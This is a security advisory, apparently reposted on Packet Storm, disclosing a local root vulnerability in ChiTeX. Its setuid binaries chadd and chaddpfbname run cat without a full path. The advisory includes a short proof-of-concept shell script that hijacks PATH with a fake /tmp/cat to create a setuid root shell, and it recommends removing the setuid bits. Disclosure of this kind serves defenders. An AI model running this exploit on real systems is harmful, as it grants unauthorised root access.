ChiTeX, the utility used to put Chinese Big5 codes in TeX/LaTeX documents, contains two setuid root binaries that execute cat without using an explicit path allowing an attacker to easily gain root privileges.
1c2236c651538e4aaaa0b8f89bbc85cd212f6cf79eed7e9609ddef1998071e56
==================================================================
Safemode.org security advisory: CHITEX
==================================================================
Introduction:
=============
ChiTeX can be used to put Chinese Big5 codes in TeX/LaTeX documents.
Operations with the ChiTeX are just like the English TeX, apart
from some special instructions in it. For more information about
this package, refer to the homepage of the author Chen Hung-Yih:
http://www.math.ncu.edu.tw/~yih/intro.htm (Chinese)
The ChiTeX packages contains 2 setuid root binaries that execute
cat without using an explicit path. This bug can allow local users
to gain root level privileges.
Affected versions:
==================
ChiTeX version 6.1.2p7.8-1 was tested to be vulnerable. It is very
likely that this issue also affects other, especially older,
versions of ChiTeX.
Problem description:
====================
The setuid root binaries chadd and chaddpfbname use the following
system() functions:
chadd:
system("cat special.tmp >> $TEXMF/fontname/special.map");
chaddpfbname:
system("cat psfontsmap@ >> $psfontsmap");
system("cat psfontsmap@ >> $pdftexmap");
As you can see, cat is executed without using a full path. If a user
creates a file called 'cat' in /tmp, adds /tmp to $PATH and then
executes chadd or chaddpfbname, the cat file will be executed with
root privileges.
A user can also create a file named 'psfontsmap@' and let chaddpfbname
append this file's content to any file defined in the $pdftexmap
or $psfontsmap environment variables.
The script below will demonstrate this vulnerability by creating
a setuid root shell and the file /tmp/owned (with 'owned' as content)
--- start ---
#!/bin/sh
echo 'owned' > 'psfontsmap@'
export psfontsmap=/tmp/owned
echo "/bin/cp /bin/sh /tmp/.sh" > /tmp/cat
echo "/bin/chmod 4755 /tmp/.sh" >> /tmp/cat
chmod +x /tmp/cat
cd /tmp
export PATH="/tmp:$PATH"
/usr/local/bin/chaddpfbname
/tmp/.sh -c id
/tmp/.sh
--- stop ---
Note this is simple proof of concept code: you might have to change the path
to chaddpfbname.
Fix information:
================
The author, professor Chen Hung-Yih, was been notified about this
issue several weeks ago but unfortunately, did not release a fix
yet.
Remove the setuid permissions from the binaries.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed